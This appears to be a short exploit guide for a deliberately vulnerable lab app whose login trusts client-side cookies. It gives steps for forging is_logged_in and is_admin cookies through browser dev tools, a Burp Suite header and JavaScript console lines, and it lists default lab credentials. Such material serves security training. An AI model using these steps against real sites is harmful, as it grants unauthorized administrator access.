๐ฏ Vulnerability Info
Type: Authentication Bypass
Severity: Critical
๐ก How to Exploit
- Authentication relies on client-side cookies
- Cookies can be modified using browser dev tools
- No server-side verification of cookie values
๐งช Exploitation Steps
- Open browser Developer Tools (F12)
- Go to Application โ Cookies
- Add cookie:
is_logged_in=true
- Add cookie:
is_admin=true
- Refresh the page
๐ง Burp Suite Method
1. Intercept any request
2. Add header:
Cookie: is_logged_in=true; is_admin=true
3. Forward the request
๐ Using JavaScript Console
document.cookie = "is_logged_in=true; path=/";
document.cookie = "is_admin=true; path=/";
location.reload();
๐ Valid Credentials
- admin / admin123 (admin role)
- user / user123 (user role)